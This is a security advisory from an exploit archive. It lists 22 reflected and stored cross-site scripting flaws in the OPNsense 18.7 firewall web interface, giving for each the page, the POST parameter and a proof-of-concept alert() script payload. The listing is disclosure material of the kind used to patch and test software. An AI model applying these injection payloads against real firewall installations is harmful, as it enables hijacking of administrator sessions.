OPNsense 18.7 Cross Site Scripting

2019.01.29
Credit: Ozer Goker
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

################################################################################################################################## # Exploit Title: OPNsense 18.7 | Cross-Site Scripting # Date: 28.01.2019 # Exploit Author: Ozer Goker # Vendor Homepage: https://opnsense.org # Software Link: http://mirror.ams1.nl.leaseweb.net/opnsense/releases/mirror/OPNsense-18.7-OpenSSL-dvd-amd64.iso.bz2 # Version: 18.7 ################################################################################################################################## Introduction OPNsense is an open source, easy-to-use and easy-to-build FreeBSD based firewall and routing platform. OPNsense includes most of the features available in expensive commercial firewalls, and more in many cases. It brings the rich feature set of commercial offerings with the benefits of open and verifiable sources. ################################################################################# XSS details: Reflected & Stored ################################################################################# XSS1 | Reflected URL https://192.168.2.200/diag_backup.php METHOD Post PARAMETER GDrive_GDriveEmail PAYLOAD "><script>alert(1)</script> ################################################################################# XSS2 | Reflected URL https://192.168.2.200/diag_backup.php METHOD Post PARAMETER GDrive_GDriveFolderID PAYLOAD "><script>alert(2)</script> ################################################################################# XSS3 | Reflected URL https://192.168.2.200/diag_backup.php METHOD Post PARAMETER GDrive_GDriveBackupCount PAYLOAD "><script>alert(3)</script> ################################################################################# XSS4 | Stored URL https://192.168.2.200/diag_backup.php METHOD Post PARAMETER Nextcloud_url PAYLOAD "><script>alert(4)</script> ################################################################################# XSS5 | Stored URL https://192.168.2.200/diag_backup.php METHOD Post PARAMETER Nextcloud_password PAYLOAD "><script>alert(5)</script> ################################################################################# XSS6 | Stored URL https://192.168.2.200/diag_backup.php METHOD Post PARAMETER Nextcloud_password PAYLOAD "><script>alert(6)</script> ################################################################################# XSS7 | Stored URL https://192.168.2.200/diag_backup.php METHOD Post PARAMETER Nextcloud_password_encryption PAYLOAD "><script>alert(7)</script> ################################################################################# XSS8 | Reflected URL https://192.168.2.200/diag_backup.php METHOD Post PARAMETER Nextcloud_backupdir PAYLOAD "><script>alert(8)</script> ################################################################################# XSS9 | Stored URL https://192.168.2.200/system_advanced_sysctl.php?act=edit&id=0 METHOD Post PARAMETER tunable PAYLOAD "><script>alert(9)</script> ################################################################################# XSS10 | Stored URL https://192.168.2.200/system_advanced_sysctl.php?act=edit&id=0 METHOD Post PARAMETER value PAYLOAD "><script>alert(10)</script> ################################################################################# XSS11 | Reflected URL https://192.168.2.200/interfaces_vlan_edit.php METHOD Post PARAMETER tag PAYLOAD "><script>alert(11)</script> ################################################################################# XSS12 | Reflected URL https://192.168.2.200/interfaces_vlan_edit.php METHOD Post PARAMETER descr PAYLOAD "><script>alert(12)</script> ################################################################################# XSS13 | Reflected URL https://192.168.2.200/interfaces_vlan_edit.php METHOD Post PARAMETER vlanif PAYLOAD "><script>alert(13)</script> ################################################################################# XSS14 | Reflected URL https://192.168.2.200/diag_ping.php METHOD Post PARAMETER host PAYLOAD "><script>alert(14)</script> ################################################################################# XSS15 | Reflected URL https://192.168.2.200/diag_traceroute.php METHOD Post PARAMETER host PAYLOAD "><script>alert(15)</script> ################################################################################# XSS16 | Stored URL https://192.168.2.200/firewall_rules_edit.php?if=FloatingRules METHOD Post PARAMETER category PAYLOAD "><script>alert(16)</script> ################################################################################# XSS17 | Stored URL https://192.168.2.200/firewall_rules_edit.php?if=lan METHOD Post PARAMETER category PAYLOAD "><script>alert(17)</script> ################################################################################# XSS18 | Stored URL https://192.168.2.200/firewall_rules_edit.php?if=wan METHOD Post PARAMETER category PAYLOAD "><script>alert(18)</script> ################################################################################# XSS19 | Reflected URL https://192.168.2.200/vpn_ipsec_settings.php METHOD Post PARAMETER passthrough_networks%5B%5D PAYLOAD <img%20src=x%20onerror=alert(19)> ################################################################################# XSS20 | Reflected URL https://192.168.2.200/ui/monit METHOD Post PARAMETER mailserver PAYLOAD <img src=x onerror=alert(20)> ################################################################################# XSS21 | Reflected URL https://192.168.2.200/ui/proxy METHOD Post PARAMETER ignoreLogACL PAYLOAD <img src=x onerror=alert(21)> ################################################################################# XSS22 | Reflected URL https://192.168.2.200/ui/proxy METHOD Post PARAMETER alternateDNSservers PAYLOAD <img src=x onerror=alert(22)> #################################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top